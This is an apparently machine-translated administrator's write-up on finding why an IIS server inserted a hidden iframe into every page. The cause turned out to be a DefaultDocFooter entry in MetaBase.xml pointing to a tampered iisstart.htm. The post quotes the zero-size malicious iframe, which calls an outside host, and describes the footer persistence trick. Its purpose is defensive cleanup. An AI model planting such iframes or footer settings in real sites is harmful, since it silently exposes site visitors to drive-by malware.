When a server opens almost all websites, even HTML pages appear.
<iframe src=" http://xxxdfsfd/web.htm " height=0 width=0></iframe>
Some of this style of code is in the head and some in the tail part. Anti-virus software will report viruses when opened.
I can't find this code in the source code when I open the HTML or ASP PHP page.
Analyze the reasons
First, I suspected ARP malware. I used anti-ARP tools and found no arp spoofing.
Moreover, arp spoofing is generally not inserted into the code every time, but sometimes and sometimes
And you can also find this code when accessing using http://127.0.0.1 or http://localhost
The possibility of arp spoofing is eliminated.
Then I thought that the JS may have been tampered with, or other included files. After searching, no modified pages were found. Even when browsing the newly created HTML page, this code will be inserted, so it can only be hung up through IIS. .
After backing up the iis data and then reinstalling iis, the code disappeared. After restoring the backed up iis, the problem came again.
After searching carefully, the problem should lie in the IIS configuration file. When I opened the configuration file, I did not find that piece of code.
It is very likely that a certain file is being called. How can I check this? I suddenly remembered the famous Filemon.
I downloaded one locally and uploaded it to the server. I opened Filemon. There was too much data. I filtered out some useless ones.
Only the iis process is left, and there is still a lot of data. It seems that many people are visiting the site on the server.
Close all sites and build a test site anky. The directory is D:www and create a blank page test.htm below.
Visit this page, the code has been inserted, and take a look at Filemon. It is strange how to read C:Inetpubwwwrootiisstart.htm
Open C:Inetpubwwwrootiisstart.htm and see that there is
<iframe src=" http://xxxdfsfd/web.htm " height=0 width=0></iframe>
Delete the code and leave it blank. When accessing test.htm, it is normal. Delete C:Inetpubwwwrootiisstart.htm and access it again.
This is where the problem of "Error reading data footer file" appears in test.htm. It seems that it is called
this file.
It will be normal if you clear C:Inetpubwwwrootiisstart.htm. How can this be done? To solve the problem, of course you have to unplug it.
continue
Is it possible that it is caused by an extension? I checked it in the extension and everything is normal.
Of course, there are also Trojan Trojans through ISAPI.
After much deliberation, I finally felt that there was something wrong with the configuration file.
Open the configuration file, which is located in %windir%system32inetsrvMetaBase.xml
Open it with Notepad, search for iisstart.htm and find a line. I thought it was the default site at first, but then I thought it was wrong.
The default sites have been deleted. Take a closer look at this code:
DefaultDocFooter="FILE:C:Inetpubwwwrootiisstart.htm"
Delete this line and the problem is completely solved.